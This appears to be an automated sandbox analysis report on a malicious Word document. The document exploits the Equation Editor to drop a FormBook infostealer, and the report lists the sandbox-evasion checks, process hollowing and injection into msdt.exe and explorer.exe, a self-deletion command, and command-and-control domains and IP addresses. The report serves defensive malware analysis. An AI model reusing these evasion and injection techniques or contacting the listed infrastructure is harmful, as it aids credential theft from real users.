          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO789.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDB31.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/9@6/5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: medicomzx[1].exe.2.dr, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: medicomsh78694.exe.2.dr, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037AAA8 push eax; retn 0036h
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037EB30 push ebx; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037ABC8 push esp; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037B558 push eax; retf 0036h
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B832 push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B83B push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B89C push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C940 push dword ptr [D38E3050h]; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00409BCE push edx; retf
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00413FD9 push edx; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B7E5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0040B7F3 push ebp; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FDFA1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16750619992
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16750619992
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: medicomsh78694.exe PID: 2824, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe TID: 2032Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.514300664.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.425259363.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.muzicalbox.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.13 80
          Source: C:\Windows\explorer.exeDomain query: www.extraordinarymiracle.com
          Source: C:\Windows\explorer.exeDomain query: www.realstakepool.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 109.94.209.123 80
          Source: C:\Windows\explorer.exeDomain query: www.prestigiousuniforms.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: C40000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory written: C:\Users\user\AppData\Roaming\medicomsh78694.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeQueries volume information: C:\Users\user\AppData\Roaming\medicomsh78694.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
